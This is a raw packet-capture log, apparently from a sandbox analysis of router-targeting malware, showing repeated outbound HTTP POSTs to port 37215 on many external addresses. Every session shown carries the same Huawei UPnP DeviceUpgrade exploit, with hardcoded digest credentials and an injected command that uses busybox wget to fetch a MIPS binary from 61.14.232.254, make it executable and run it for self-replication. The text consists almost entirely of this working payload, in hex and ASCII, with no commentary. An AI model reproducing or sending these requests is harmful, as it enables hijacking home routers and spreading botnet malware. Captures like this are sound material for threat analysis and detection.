                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2022192.168.2.135689041.157.54.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687994003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2023192.168.2.1334462153.145.204.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688038111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2024192.168.2.134224632.120.57.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688065052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2025192.168.2.133749041.167.14.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688116074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2026192.168.2.134634241.147.53.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688133001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2027192.168.2.1341048157.221.111.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688180923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2028192.168.2.1348764157.179.47.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688198090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2029192.168.2.134795641.6.101.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688209057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2030192.168.2.135325041.136.209.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688234091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2031192.168.2.1352788157.241.193.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.688251019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 